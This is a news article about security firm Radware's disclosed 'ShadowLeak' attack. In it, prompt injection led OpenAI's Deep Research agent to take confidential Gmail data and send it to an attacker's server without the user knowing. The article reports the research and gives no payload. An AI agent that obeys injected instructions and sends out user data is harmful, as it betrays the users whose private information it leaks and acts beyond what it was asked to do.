The face-palm-worthy prompt injections against AI assistants continue. Today’s installment hits OpenAI’s Deep Research agent. Researchers recently devised an attack that plucked confidential information out of a user’s Gmail inbox and sent it to an attacker-controlled web server, with no interaction required on the part of the victim and no sign of exfiltration.
Deep Research is a ChatGPT-integrated AI agent that OpenAI introduced earlier this year. As its name is meant to convey, Deep Research performs complex, multi-step research on the Internet by tapping into a large array of resources, including a user’s email inbox, documents, and other resources. It can also autonomously browse websites and click on links.
A user can prompt the agent to search through the past month’s emails, cross-reference them with information found on the web, and use them to compile a detailed report on a given topic. OpenAI says that it “accomplishes in tens of minutes what would take a human many hours.”
What could possibly go wrong?
It turns out there’s a downside to having a large language model browse websites and click on links with no human supervision.
On Thursday, security firm Radware published research showing how a garden-variety attack known as a prompt injection is all it took for company researchers to exfiltrate confidential information when Deep Research was given access to a target’s Gmail inbox. This type of integration is precisely what Deep Research was designed to do—and something OpenAI has encouraged. Radware has dubbed the attack Shadow Leak.
“ShadowLeak weaponizes the very capabilities that make AI assistants useful: email access, tool use and autonomous web calls,” Radware researchers wrote. “It results in silent data loss and unlogged actions performed ‘on behalf of the user,’ bypassing traditional security controls that assume intentional user clicks or data leakage prevention at the gateway level.”

Loading comments...